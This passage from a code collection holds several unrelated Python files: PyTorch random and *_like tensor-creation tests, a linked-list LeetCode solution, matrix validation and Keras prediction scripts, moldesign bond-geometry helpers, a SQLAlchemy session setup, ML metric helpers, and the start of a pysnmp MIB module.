            torch.randn(size, size, out=res2)
            self.assertEqual(res1, res2)

    @dtypes(torch.float, torch.double, torch.complex64, torch.complex128)
    def test_rand(self, device, dtype):
        """Seeded rand matches between the return and out= overloads,
        including the zero-size case."""
        SIZE = 100
        for size in [0, SIZE]:
            torch.manual_seed(123456)
            res1 = torch.rand(size, size, dtype=dtype, device=device)
            res2 = torch.tensor([], dtype=dtype, device=device)
            torch.manual_seed(123456)
            torch.rand(size, size, out=res2)
            self.assertEqual(res1, res2)

    @slowTest
    def test_randperm(self, device):
        """randperm: out=/return agreement, default dtype, n == 0, overflow
        checks for floating dtypes, and non-contiguous out tensors."""
        if device == 'cpu':
            rng_device = None
        else:
            rng_device = [device]

        # Test core functionality. On CUDA, for small n, randperm is offloaded to CPU instead. For large n, randperm is
        # executed on GPU.
        for n in (100, 50000, 100000):
            # Ensure both integer and floating-point numbers are tested. Half follows an execution path that is
            # different from others on CUDA.
            for dtype in (torch.long, torch.half, torch.float):
                if n > 2049 and dtype == torch.half:  # Large n for torch.half will raise an exception, do not test here.
                    continue
                # fork_rng restores RNG state on exit, so the out= call below
                # replays the same stream and must match res1 exactly.
                with torch.random.fork_rng(devices=rng_device):
                    res1 = torch.randperm(n, dtype=dtype, device=device)
                res2 = torch.empty(0, dtype=dtype, device=device)
                torch.randperm(n, out=res2, dtype=dtype, device=device)
                self.assertEqual(res1, res2, atol=0, rtol=0)

        # Default type is long
        for n in (100, 10000):
            self.assertEqual(torch.randperm(n, device=device).dtype, torch.long)

        # randperm of 0 elements is an empty tensor
        # NOTE(review): `dtype` here is whatever the loop above ended on
        # (torch.float) — presumably fine since only numel() is checked, but
        # an explicit dtype would be clearer; confirm before changing.
        res1 = torch.randperm(0)
        res2 = torch.tensor(5, dtype=dtype, device=device)
        torch.randperm(0, out=res2)
        self.assertEqual(res1.numel(), 0)
        self.assertEqual(res2.numel(), 0)

        # Test exceptions when n is too large for a floating point type
        for dtype, small_n, large_n in ((torch.half, 2**11 + 1, 2**11 + 2),
                                        (torch.float, 2**24 + 1, 2**24 + 2),
                                        (torch.double, 2**25,  # 2**53 + 1 is too large to run
                                         2**53 + 2)):
            res = torch.empty(0, dtype=dtype, device=device)
            torch.randperm(small_n, out=res)  # No exception expected
            self.assertRaises(RuntimeError, lambda: torch.randperm(large_n, out=res, device=device))

        # Test non-contiguous tensors
        for n in (4, 5, 6, 10, 20):
            non_contiguous_tensor = torch.zeros((2, 3), dtype=torch.long, device=device).t()
            self.assertFalse(non_contiguous_tensor.is_contiguous())
            with torch.random.fork_rng(devices=rng_device):
                res = torch.randperm(n, dtype=torch.long, device=device)
            torch.randperm(n, out=non_contiguous_tensor)
            self.assertEqual(non_contiguous_tensor, res)
# Class for testing *like ops, like torch.ones_like
class TestLikeTensorCreation(TestCase):
    """Tests for the *_like factory functions (ones_like, zeros_like, ...)."""
    exact_dtype = True

    # TODO: this test should be updated
    def test_ones_like(self, device):
        """ones_like copies shape/device/dtype and fills with ones,
        including for boolean tensors."""
        for template in (torch.ones(100, 100, device=device),
                         torch.tensor([True, True], device=device, dtype=torch.bool)):
            self.assertEqual(torch.ones_like(template), template)

    # TODO: this test should be updated
    @onlyCPU
    def test_empty_like(self, device):
        """empty_like preserves shape and type string across empty, float,
        and integer Variables."""
        templates = (torch.autograd.Variable(torch.Tensor()),
                     torch.autograd.Variable(torch.randn(4, 4)),
                     torch.autograd.Variable(torch.IntTensor([1, 2, 3])))
        for template in templates:
            result = torch.empty_like(template)
            self.assertEqual(result.shape, template.shape)
            self.assertEqualTypeString(result, template)

    def test_zeros_like(self, device):
        """zeros_like matches an explicitly constructed zeros tensor."""
        reference = torch.zeros((100, 100,), device=device)
        self.assertEqual(torch.zeros_like(reference), reference)

    @deviceCountAtLeast(2)
    def test_zeros_like_multiple_device(self, devices):
        """zeros_like of a tensor on a secondary device still compares equal
        to zeros created on the primary device."""
        reference = torch.zeros(100, 100, device=devices[0])
        source = torch.randn(100, 100, device=devices[1], dtype=torch.float32)
        self.assertEqual(torch.zeros_like(source), reference)

    @deviceCountAtLeast(2)
    def test_ones_like_multiple_device(self, devices):
        """Same cross-device check as above, for ones_like."""
        reference = torch.ones(100, 100, device=devices[0])
        source = torch.randn(100, 100, device=devices[1], dtype=torch.float32)
        self.assertEqual(torch.ones_like(source), reference)

    # Full-like precedence is the explicit dtype then the dtype of the "like"
    # tensor.
    @onlyOnCPUAndCUDA
    def test_full_like_inference(self, device):
        """full_like takes its dtype from the template unless one is given."""
        like = torch.empty((5,), device=device, dtype=torch.long)

        self.assertEqual(torch.full_like(like, 1.).dtype, torch.long)
        self.assertEqual(torch.full_like(like, 1., dtype=torch.complex64).dtype,
                         torch.complex64)
# Register device-parameterized variants (e.g. ...CPU / ...CUDA) of each test
# class into this module's namespace so the test runner discovers them.
instantiate_device_type_tests(TestTensorCreation, globals())
instantiate_device_type_tests(TestRandomTensorCreation, globals())
instantiate_device_type_tests(TestLikeTensorCreation, globals())

if __name__ == '__main__':
    run_tests()
|
from typing import Dict
class ListNode:
    """A singly linked list node: a value and a pointer to the next node."""

    def __init__(self, x):
        # New nodes start detached (no successor).
        self.val, self.next = x, None
class Solution:
    def removeZeroSumSublists(self, head: ListNode) -> ListNode:
        """Remove all consecutive sublists that sum to zero (LeetCode 1171).

        Single pass using running prefix sums. Because Python dicts preserve
        insertion order and ``dict.popitem()`` removes the most recently
        inserted entry, re-seeing a prefix sum means every node recorded
        since its first occurrence belongs to a zero-sum run: those entries
        are popped and the list is spliced past the run.
        """
        curr = dummy = ListNode(0)  # dummy node simplifies removals at the head
        dummy.next = head
        prefix_sum = 0
        seen = {}  # type: Dict[int, ListNode]
        while curr:
            prefix_sum += curr.val
            # Node after which a zero-sum run would start (curr if sum is new).
            node = seen.get(prefix_sum, curr)
            # Pop (LIFO on insertion order) everything recorded since that
            # earlier occurrence — those nodes form the zero-sum run.
            while prefix_sum in seen:
                seen.popitem()
            seen[prefix_sum] = node
            # Splice past the run; a no-op when node is curr.
            node.next, curr = curr.next, curr.next
        return dummy.next
|
#!/usr/bin/python
# Python 2 scratch/validation script: exercises the compiled `tlsvld`
# extension module (3x3 matrix helpers and the Rosenfeld test) and
# cross-checks its Rosenfeld value against a pure-numpy computation.
import tlsvld
import scipy
import numpy
import math
# U and V: symmetric 3x3 matrices (presumably anisotropic displacement
# tensors, given the Rosenfeld test below -- TODO confirm).
U = tlsvld.array([[0.37471362,-0.07411912,-0.0379023],[-0.07411912,0.39010298,-0.03240841],[-0.0379023,-0.03240841,0.33057791]])
V = tlsvld.array([[0.38484156,-0.06933809,-0.04994903],[-0.06933809,0.41376374,-0.03275701],[-0.04994903,-0.03275701,0.33967632]])
#print U
#print V
#print "="*80
#U = scipy.array([[0.37471362,-0.07411912,-0.0379023],[-0.07411912,0.39010298,-0.03240841],[-0.0379023,-0.03240841,0.33057791]])
#V = scipy.array([[0.38484156,-0.06933809,-0.04994903],[-0.06933809,0.41376374,-0.03275701],[-0.04994903,-0.03275701,0.33967632]])
#V = scipy.array([[100.38484156,-0.06933809,-0.04994903],[-0.06933809,0.41376374,-0.03275701],[-0.04994903,-0.03275701,0.33967632]])
#print U
#print V
#print "="*80
#U = tlsvld.array([[7,7,7],[7,7,7],[7,7,7]])
#V = tlsvld.array([[4,4,4],[4,4,4],[4,4,4]])
# Simple constant matrices for the arithmetic helpers.
W = tlsvld.array([[1.0,1.0,1.0],[1.0,1.0,1.0],[1.0,1.0,1.0]])
X = tlsvld.array([[4.0,4.0,4.0],[4.0,4.0,4.0],[4.0,4.0,4.0]])
# Exercise the elementwise/trace helpers on the constant matrices.
print "SQD = ",tlsvld.sum_square_diff(W,X)
#print "trace(U) = ", tlsvld.trace3x3(X)
print "dtUV = ",tlsvld.diff_trace_uv(W,X)
print tlsvld.mul3x3(U,V)
print tlsvld.add3x3(U,V)
print "SUM(W) = ",tlsvld.sum3x3(X)
print tlsvld.subtract3x3(U,V)
#print tlsvld.trn3x3(U)
#print tlsvld.inv3x3(U)
#W = scipy.array([[0,0,0],[0,0,0],[0,0,0]])
#det, invU = tlsvld.inv3x3(U)
#print "PYTHON: det(U) = %s" % det
#print "PYTHON: inv(U) = %s" % invU
#print "="*80
#X = scipy.array([[1,0,0],[0,2,0],[0,0,3]])
#Y = scipy.array([[1,0,0],[0,2,0],[0,0,3]])
#print tlsvld.add3x3(X,Y)
#print tlsvld.calc_ccuij(X, Y)
#print "="*80
print "CCuij = %s" % tlsvld.calc_ccuij(U, V)
#print "EIGENS = ", tlsvld.jacobi(U,3,3, EIGENS, EVECS )
print U
print "EIGENS = ", tlsvld.eigenvalues(U)
# Two arbitrary 3D points used for the Rosenfeld cross-check.
x1 = 1.00
y1 = 2.00
z1 = 3.00
x2 = 6.00
y2 = 5.00
z2 = 4.00
# Euclidean distance between the two points.
d = math.sqrt( (x1-x2)**2 + (y1-y2)**2 + (z1-z2)**2 )
# Re-create U and V (the Fortran calls above may have touched them --
# presumably defensive; confirm whether tlsvld mutates its arguments).
U = tlsvld.array([[0.37471362,-0.07411912,-0.0379023],[-0.07411912,0.39010298,-0.03240841],[-0.0379023,-0.03240841,0.33057791]])
V = tlsvld.array([[0.38484156,-0.06933809,-0.04994903],[-0.06933809,0.41376374,-0.03275701],[-0.04994903,-0.03275701,0.33967632]])
print d
a = tlsvld.array([x1,y1,z1])
b = tlsvld.array([x2,y2,z2])
# n = numpy.array([(a[0] - b[0])/d, (a[1] - b[1])/d, (a[2] - b[2])/d])
# Un = numpy.dot(numpy.dot(n, U), numpy.transpose(n))
# Vn = numpy.dot(numpy.dot(n, V), numpy.transpose(n))
# return abs(Un - Vn)
# Pure-numpy Rosenfeld value: project U and V onto the unit interatomic
# vector n and compare the two projections.
n = numpy.array([(a[0] - b[0])/d, (a[1] - b[1])/d, (a[2] - b[2])/d])
Un = numpy.dot(numpy.dot(n, U), numpy.transpose(n))
Vn = numpy.dot(numpy.dot(n, V), numpy.transpose(n))
print "[Python] DOT(n, U) = ", numpy.dot(n, U)
print "[Python] d = ", d
print "[Python] Rosenfeld = ", abs(Un - Vn)
print "="*80
# The Fortran implementation must agree with the numpy value above.
print "[Fortran] Rosenfeld = ", tlsvld.rosenfeld(a,b,U,V)
|
"""Run a trained custom Keras model over the test set and save predictions.

Fixes over the previous revision:
  * `importlib.machinery` / `importlib.util` were used without being
    imported (NameError at the SourceFileLoader call).
  * The TF1 session config no longer shadows the YAML `config` dict.
  * The pkl-suffix regex escapes the dot (`\d+\.pkl`), so it cannot match
    an arbitrary character before "pkl".
"""
import importlib.machinery
import importlib.util
import os
import re

from tqdm import tqdm
import tensorflow as tf

from erinn.python.generator import PredictGenerator
from erinn.python.utils.io_utils import read_config_file, get_pkl_list, read_pkl, write_pkl

# ---- settings ---------------------------------------------------------------
config_file = os.path.join('..', 'config', 'config.yml')
config = read_config_file(config_file)
glob_para_pkl = config['glob_para_pkl']
pkl_dir_test = os.path.join('..', 'data', 'raw_data', 'test')
model_dir = os.path.join('..', 'models', 'txrx')
weights_dir = os.path.join(model_dir, 'weights')
predictions_dir = os.path.join(model_dir, 'predictions')
preprocess_generator = config['preprocess_generator']
gpus = 1  # number of GPUs to make visible to TensorFlow

# ---- allow GPU memory growth ------------------------------------------------
if tf.__version__.startswith('1.'):
    # TF1: growth is configured through the session config. Use a distinct
    # name so the YAML `config` dict above is not overwritten.
    tf_config = tf.ConfigProto()
    tf_config.gpu_options.allow_growth = True
    session = tf.Session(config=tf_config)
    tf.keras.backend.set_session(session)
else:
    physical_gpus = tf.config.experimental.list_physical_devices('GPU')
    if physical_gpus:
        try:
            # Set visible gpus in TensorFlow
            tf.config.experimental.set_visible_devices(physical_gpus[0:gpus], 'GPU')
            visible_gpus = tf.config.experimental.get_visible_devices('GPU')
            # Currently, memory growth needs to be the same across GPUs
            for visible_gpu in visible_gpus:
                tf.config.experimental.set_memory_growth(visible_gpu, True)
                print('The memory growth of', visible_gpu, ':', tf.config.experimental.get_memory_growth(visible_gpu))
            logical_gpus = tf.config.experimental.list_logical_devices('GPU')
            print(len(physical_gpus), "Physical GPUs,", len(logical_gpus), "Logical GPUs")
        except RuntimeError as e:
            # Visible devices/Memory growth/Virtual devices must be set before GPUs have been initialized
            print(e)
    else:
        print("Not enough GPU hardware devices available")

# ---- load the custom keras model and its trained weights --------------------
# config['custom_NN'] contains two single-quoted strings: the model class
# name and the path to the .py file defining it (presumably -- verify
# against the config format).
pattern = re.compile(r'\'([^\']+)\'')
module_name, py_file = re.findall(pattern, config['custom_NN'])
loader = importlib.machinery.SourceFileLoader(module_name, py_file)
spec = importlib.util.spec_from_loader(module_name, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
model = getattr(module, module_name)()
model.load_weights(os.path.join(weights_dir, 'trained_weight.h5'))

# ---- data generator ---------------------------------------------------------
pkl_list_test = get_pkl_list(pkl_dir_test)
input_shape = model.input_shape[1:]
output_shape = model.output_shape[1:]
testing_generator = PredictGenerator(pkl_list_test, input_shape, output_shape,
                                     batch_size=64, glob_para_pkl=glob_para_pkl,
                                     **preprocess_generator)

# ---- prediction -------------------------------------------------------------
print('\nPredict.')
predict = model.predict_generator(testing_generator, workers=os.cpu_count(), verbose=True)

# ---- save predictions alongside their inputs/targets ------------------------
os.makedirs(predictions_dir, exist_ok=True)
with tqdm(total=len(pkl_list_test), desc='write pkl') as pbar:
    for i, pred in enumerate(predict):
        data = read_pkl(pkl_list_test[i])
        data['synth_V'] = data.pop('inputs').reshape(input_shape[0:2])
        data['synth_log_rho'] = data.pop('targets').reshape(output_shape[0:2])
        data['pred_log_rho'] = pred.reshape(output_shape[0:2])
        # Keep the numeric suffix of the source file, e.g. "result_123.pkl".
        suffix = re.findall(r'\d+\.pkl', pkl_list_test[i])[0]
        write_pkl(data, os.path.join(predictions_dir, f'result_{suffix}'))
        pbar.update()
|
from __future__ import print_function, absolute_import, division
from future.builtins import *
from future import standard_library
standard_library.install_aliases()
# Copyright 2017 Autodesk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import moldesign as mdt
import moldesign.molecules.atomcollections
from moldesign import external
from moldesign.mathutils import sub_angles, apply_4x4_transform
from . import toplevel, angle, dihedral
from .coords import _infer_dihedral
@toplevel
def set_distance(a1, a2, newlength, adjustmol=True):
    """ Set the distance between two atoms. They will be adjusted along the vector separating them.

    If the two atoms are A) bonded, B) not part of the same ring system, and C) ``adjustmol`` is
    True, then the entire molecule's positions will be modified as well

    Args:
        a1,a2 (mdt.Atom): atoms to adjust
        newlength (u.Scalar[length]): new length to set
        adjustmol (bool): Adjust all atoms on either side of this bond?
    """
    #TODO: lots of room for optimization here
    if adjustmol:
        # Moving the whole molecule only makes sense if both atoms belong to it.
        assert a1.molecule is not None
        assert a1.molecule == a2.molecule

    vec = a1.position - a2.position
    dist = np.sqrt(vec.dot(vec))  # current separation (unit-bearing scalar)
    direction = (vec / dist)      # unit vector from a2 toward a1
    delta = newlength - dist
    # Early out when the requested change is negligible. delta carries units;
    # delta.get_units() presumably yields 1.0 in those units -- TODO confirm.
    if np.abs(delta) < 1.0e-5 * delta.get_units(): return

    if not adjustmol:
        # Split the adjustment symmetrically between the two atoms.
        a1.position += direction * delta / 2.0
        a2.position -= direction * delta / 2.0
    else:
        # Translate the whole fragment on a1's side of the bond by delta.
        mol = a1.molecule
        indices, sign = _get_fragment_indices(mol, a1, a2)
        mol.positions[indices] += delta*direction*sign
@toplevel
def set_angle(a1, a2, a3, theta, adjustmol=True):
    """ Set the angle between bonds a1-a2 and a3-a2. The atoms will be adjusted along the
    gradient of the angle.

    If ``adjustmol`` is True and the topology is unambiguous, then the entire molecule's positions
    will be modified as well

    Args:
        a1,a2,a3 (mdt.Atom): atoms to adjust
        theta (u.Scalar[angle]): new angle to set
        adjustmol (bool): Adjust all atoms on either side of this bond?
    """
    # TODO: deal with co-linear a1, a2, a3 - the rotation axis is ill-defined in this case \
    # (require an axis to be specified)
    # TODO: weakly cache the rotation axis so that users can set angle to 0 or 180 without losing the axis
    current = angle(a1, a2, a3)
    # Signed angular correction needed to reach theta.
    rotation = sub_angles(current, theta)
    if abs(rotation) < 1.0e-6: return  # already at the requested angle

    # Rotation axis perpendicular to the a2->a1 and a2->a3 bond vectors.
    axis = np.cross(a1.position - a2.position, a3.position - a2.position)  # do vecs need to be normalized?

    if not adjustmol:
        # Rotate a1 and a3 by half the correction each, in opposite directions,
        # about an axis through a2.
        rotmat_l = external.transformations.rotation_matrix(rotation / 2.0, axis, a2.position)
        rotmat_r = external.transformations.rotation_matrix(-rotation / 2.0, axis, a2.position)

        a1.position = apply_4x4_transform(rotmat_l, a1.position)
        a3.position = apply_4x4_transform(rotmat_r, a3.position)

    else:
        # Rotate the whole fragment on a1's side of the a1-a2 bond by the
        # full correction; `sign` orients the axis consistently.
        mol = a2.molecule
        indices, sign = _get_fragment_indices(mol, a1, a2)
        rotmat = external.transformations.rotation_matrix(rotation, axis*sign, a2.position)
        mol.positions[indices] = apply_4x4_transform(rotmat, mol.positions[indices])
@toplevel
def set_dihedral(a1, a2=None, a3=None, a4=None, theta=None, adjustmol=True):
    """ Set the twist angle of atoms a1 and a4 around the central bond a2-a3. The atoms will be
    adjusted along the gradient of the angle.

    Can be called as ``set_dihedral(a1, a2, a3, a4, theta, adjustmol=True)``
    OR ``set_dihedral(a1, a2, theta, adjustmol=True)``
    OR ``set_dihedral(bond, theta, adjustmol=True)``

    If ``adjustmol`` is True and the topology is unambiguous, then the entire molecule's positions
    will be modified as well

    Args:
        a1 (mdt.Bond): central bond in dihedral (bond-based call form)
        a1,a2 (mdt.Atom): atoms around central bond in dihedral (the outer
            atoms a3/a4 are then inferred from the topology)
        a3, a4 (mdt.Atom): outer atoms of the dihedral (4-atom call form)
        theta (u.Scalar[angle]): new angle to set
        adjustmol (bool): Adjust all atoms on either side of this bond?
    """
    # TODO: deal with co-linear a1/a4, a2, a3 - the angle is ill-defined \
    # (should just use an arbitrary axis normal to the central bond)
    if a4 is None:
        # fewer than four atoms given: normalize the arguments into
        # (a1, a2, theta) before inferring the outer atoms
        if isinstance(a1, mdt.Bond):
            # called as set_dihedral(bond, theta): unpack the bond's two atoms
            if theta is None:
                theta = a2
            a1, a2 = a1.a1, a1.a2
        if a3 is not None and theta is None:
            # called as set_dihedral(a1, a2, theta): third positional slot
            # actually holds theta
            theta, a3 = a3, theta
        elif a3 is not None or a4 is not None or theta is None:
            raise ValueError('Invalid number of arguments for set_dihedral')
        # pick the outer dihedral atoms from the bond topology
        a1, a2, a3, a4 = _infer_dihedral(a1, a2)
    current = dihedral(a1, a2, a3, a4)
    # signed, wrapped rotation needed to reach theta
    rotation = sub_angles(theta, current)
    if abs(rotation) < 1.0e-6: return
    # rotation axis is the central bond
    axis = a2.position - a3.position
    if not adjustmol:
        # split the rotation symmetrically between the two ends of the dihedral
        rotmat_l = external.transformations.rotation_matrix((-rotation / 2.0), axis, a3.position)
        rotmat_r = external.transformations.rotation_matrix((rotation / 2.0), axis, a3.position)
        a1.position = apply_4x4_transform(rotmat_l, a1.position)
        a4.position = apply_4x4_transform(rotmat_r, a4.position)
    else:
        # rotate everything on a3's side of the central bond; sign corrects
        # the direction when the cached fragment is the other side
        mol = a2.molecule
        indices, sign = _get_fragment_indices(mol, a3, a2)
        rotmat = external.transformations.rotation_matrix(rotation, axis*sign, a3.position)
        mol.positions[indices] = apply_4x4_transform(rotmat, mol.positions[indices])
def _get_fragment(mol, a1, a2):
    """ Return all atoms on ``a1``'s side of the ``a1``-``a2`` bond.

    Conceptually the a1-a2 bond splits the molecule in two; this collects every
    atom reachable from ``a1`` without crossing that bond (including ``a1``,
    excluding ``a2``). This won't work if a1 and a2 are in a cycle.

    Args:
        mol (mdt.Molecule): molecule containing the atoms (currently unused;
            kept for interface compatibility with callers)
        a1 (mdt.Atom): atom whose side of the bond is collected
        a2 (mdt.Atom): atom on the other side of the bond

    Returns:
        moldesign.molecules.atomcollections.AtomList: atoms on a1's side

    Raises:
        ValueError: if a1 and a2 are part of the same ring system
    """
    # Iterative DFS - the previous recursive implementation could hit Python's
    # recursion limit on large molecules. To prevent crossing the a1-a2 bond,
    # a2 is marked as visited from the start.
    visited = set([a2])
    stack = [a1]
    while stack:
        atom = stack.pop()
        if atom in visited:
            continue
        visited.add(atom)
        for nbr in atom.bond_graph:
            # reaching a2 through any atom other than a1 means there is a
            # second path between a1 and a2, i.e. they share a ring
            if nbr is a2 and atom is not a1:
                raise ValueError("a1 and a2 are in a cyclic moiety")
            if nbr not in visited:
                stack.append(nbr)
    visited.remove(a2)
    result = moldesign.molecules.atomcollections.AtomList(visited)
    return result
def _get_fragment_indices(mol, a1, a2):
    """ Return the array indices of the atoms that should move when the a1-a2
    bond is adjusted, plus a direction sign (+1.0 when the returned fragment is
    a1's side of the bond, -1.0 when it is a2's side).

    Results are memoized on the function's ``cache`` attribute, keyed by
    (molecule, a1, a2).
    """
    cache = _get_fragment_indices.cache
    key = (mol, a1, a2)
    if key in cache:
        return cache[key]

    # Try to get the smaller fragment ... a bit hacky right now
    try:
        frag1 = _get_fragment(mol, a1, a2)
    except ValueError:
        frag1 = None

    try:
        frag2 = _get_fragment(mol, a2, a1)
    except ValueError:
        # both sides are cyclic - nothing can move; propagate the error
        if frag1 is None:
            raise
        frag2 = None

    # prefer the smaller fragment; fall back to whichever side succeeded
    if frag2 is not None and (frag1 is None or len(frag1) > len(frag2)):
        frag, sign = frag2, -1.0
    else:
        frag, sign = frag1, 1.0

    indices = np.array([atom.index for atom in frag])
    cache[key] = (indices, sign)
    return indices, sign
_get_fragment_indices.cache = {}
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Author : phant0ms
# @Time : 2020/8/4 15:12
# @File : session.py
from app.core.config import settings
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm import scoped_session
# Database engine for the application; pool_pre_ping validates connections
# before use so stale pooled connections are transparently replaced.
# NOTE(review): echo=True logs every SQL statement - presumably a development
# setting; confirm it should be disabled in production.
engine = create_engine(settings.SQLALCHEMY_DATABASE_URI, pool_pre_ping= True, echo=True)
# Session factory: commits and flushes are explicit (no autocommit/autoflush)
session_factory = sessionmaker(autocommit=False, autoflush=False, bind=engine)
# Thread-local session registry: each thread gets its own Session instance
SessionLocal = scoped_session(session_factory)
|
import numpy as np
import pandas as pd
from preprocessing.InputHelper import transformLabels_aux
from collections import Counter
def plotHistogram(valueList, caption):
    """Print *caption* followed by the frequency of each distinct value in
    *valueList* (most frequent first)."""
    counts = pd.Series(valueList).value_counts()
    print(caption)
    print(counts)
    # Graphical output is currently disabled:
    # counts.plot(kind='bar')
    # plt.suptitle(caption)
    # plt.show()
def getSelectedData(x, y, indexes):
    """Select the rows of *x* and *y* at the given positions.

    Args:
        x: sequence of feature rows
        y: sequence of labels (parallel to x)
        indexes: iterable of integer positions to select

    Returns:
        tuple: (numpy array of the selected x rows, plain list of the
        selected y values) - note the y selection deliberately stays a list,
        matching the original interface.
    """
    # comprehensions instead of the manual append loop
    x_sel = [x[index] for index in indexes]
    y_sel = [y[index] for index in indexes]
    return np.asarray(x_sel), y_sel
def printWordVecs(inpH):
    """Print a short diagnostic sample of the loaded word vectors: the shape
    and first five components of up to two embeddings, then the vocabulary
    size and a slice of the embedding matrix."""
    shown = 0
    for word in inpH.pre_emb:
        vec = inpH.pre_emb[word]
        print("Dimension of vectors: {}".format(vec.shape))
        print("{} {}".format(word, vec[0:5]))
        shown += 1
        if shown >= 2:
            break
    print("vocab size: {}".format(inpH.vocab_size))
    print("emb-matrix: {}...".format(inpH.embedding_matrix[1][:5]))
    print(inpH.embedding_matrix.shape)
def convertSoftmaxToLabels(y_preds):
    """Collapse a (num_samples, num_classes) matrix of softmax scores into a
    list of predicted class indices (argmax per row).

    Args:
        y_preds: 2-D numpy array of per-class scores

    Returns:
        list: the winning class index for each row
    """
    # comprehension over rows instead of the manual index loop
    return [np.argmax(row) for row in y_preds]
def computePerIntervalStats(y_vals, num_classes):
    """Compute a representative value for each class interval.

    The classes correspond to the value intervals
    [0,5) [5,10) [10,15) [15,20) [20,30) [30,50) [50,100].

    Args:
        y_vals: real-valued observations
        num_classes: number of classes passed through to transformLabels_aux

    Returns:
        dict: class index -> float; the median of the observed values that
        fall into that class, or the interval midpoint when no value does.
    """
    binned_y_vals = {0: [], 1: [], 2: [], 3: [], 4: [], 5: [], 6: []}
    # Fallback for an empty bin is the interval midpoint.
    # BUG FIX: these defaults were previously one-element *lists* (e.g. [2.5]),
    # which made float(interval_stats[k]) crash downstream for empty bins.
    interval_stats = {0: 2.5, 1: 7.5, 2: 12.5, 3: 17.5, 4: 25.0, 5: 40.0, 6: 75.0}
    y_classes = transformLabels_aux(y_vals, num_classes)
    # distribute each observed value into its class bin
    for y_class, y_val in zip(y_classes, y_vals):
        binned_y_vals[y_class].append(y_val)
    # replace the midpoint default with the observed median where possible
    for key, values_in_range in binned_y_vals.items():
        if len(values_in_range) > 0:
            values_in_range = np.asarray(values_in_range, dtype=np.float32)
            interval_stats[key] = float(np.median(values_in_range))
    return interval_stats
# Predict the median of training values within the predicted class as the
# output value, then compute RMSE with respect to the true values.
def computeTwoStagedRMSE(num_classes, fold_id, y_preds, y_train_vals, y_test_vals):
    """Two-stage RMSE: map each predicted class to a representative real value
    (the per-class median of the training values) and compute the RMSE of
    those values against the true test values.

    Args:
        num_classes: number of classes used for binning
        fold_id: fold identifier (only used for the progress printout)
        y_preds: discrete predicted class ids
        y_train_vals: real-valued training observations
        y_test_vals: real-valued ground-truth test observations

    Returns:
        float: the root-mean-square error
    """
    # first obtain the per-class representative values from the training data
    interval_stats = computePerIntervalStats(y_train_vals, num_classes)
    y_pred_vals = [float(interval_stats[y_pred]) for y_pred in y_preds]
    y = np.asarray(y_test_vals, dtype=np.float32)
    y_hats = np.asarray(y_pred_vals, dtype=np.float32)
    mse = (np.square(y - y_hats)).mean(axis=None)
    # BUG FIX: `sqrt` was previously unqualified and never imported, which
    # raised NameError at runtime; use numpy's sqrt.
    rmse = float(np.sqrt(mse))
    print("Fold {}: Two-step RMSE: {}".format(fold_id, rmse))
    return rmse
|
#
# PySNMP MIB module IANA-FINISHER-MIB (http://pysnmp.sf.net)
# ASN.1 source http://mibs.snmplabs.com:80/asn1/IANA-FINISHER-MIB
# Produced by pysmi-0.0.7 at Sun Feb 14 00:15:44 2016
# On host bldfarm platform Linux version 4.1.13-100.fc21.x86_64 by user goose
# Using Python version 3.5.0 (default, Jan 5 2016, 17:11:52)
#
# NOTE(review): this pysmi-generated module expects `mibBuilder` to be
# provided by the pysnmp MIB loading machinery at execution time - it is not
# defined in this file.
( ObjectIdentifier, OctetString, Integer, ) = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
( NamedValues, ) = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
( ConstraintsUnion, ValueRangeConstraint, ValueSizeConstraint, ConstraintsIntersection, SingleValueConstraint, ) = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsIntersection", "SingleValueConstraint")
( ModuleCompliance, NotificationGroup, ) = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
( Integer32, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, Counter64, ObjectIdentity, Unsigned32, ModuleIdentity, NotificationType, MibIdentifier, IpAddress, Bits, iso, mib_2, Counter32, TimeTicks, ) = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Counter64", "ObjectIdentity", "Unsigned32", "ModuleIdentity", "NotificationType", "MibIdentifier", "IpAddress", "Bits", "iso", "mib-2", "Counter32", "TimeTicks")
( TextualConvention, DisplayString, ) = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
# Module identity for IANA-FINISHER-MIB (OID 1.3.6.1.2.1.110)
ianafinisherMIB = ModuleIdentity((1, 3, 6, 1, 2, 1, 110)).setRevisions(("2004-06-02 00:00",))
# Descriptive texts are only attached when the builder is configured to load them
if mibBuilder.loadTexts: ianafinisherMIB.setLastUpdated('200406020000Z')
if mibBuilder.loadTexts: ianafinisherMIB.setOrganization('IANA')
if mibBuilder.loadTexts: ianafinisherMIB.setContactInfo('Internet Assigned Numbers Authority\n\n Postal: ICANN\n 4676 Admiralty Way, Suite 330\n Marina del Rey, CA 90292\n\n Tel: +1 310 823 9358\n E-Mail: iana@iana.org')
if mibBuilder.loadTexts: ianafinisherMIB.setDescription('This MIB module defines a set of finishing-related\n TEXTUAL-CONVENTIONs for use in Finisher MIB (RFC 3806)\n and other MIBs which need to specify finishing\n mechanism details.\n\n Any additions or changes to the contents of this MIB\n module require either publication of an RFC, or\n Designated Expert Review as defined in RFC 2434,\n Guidelines for Writing an IANA Considerations Section\n in RFCs. The Designated Expert will be selected by\n the IESG Area Director(s) of the Applications Area.\n\n Copyright (C) The Internet Society (2004). The\n\n initial version of this MIB module was published\n in RFC 3806. For full legal notices see the RFC\n itself or see:\n http://www.ietf.org/copyrights/ianamib.html')
# Textual convention enumerating finisher device types (RFC 3806)
class FinDeviceTypeTC(Integer32, TextualConvention):
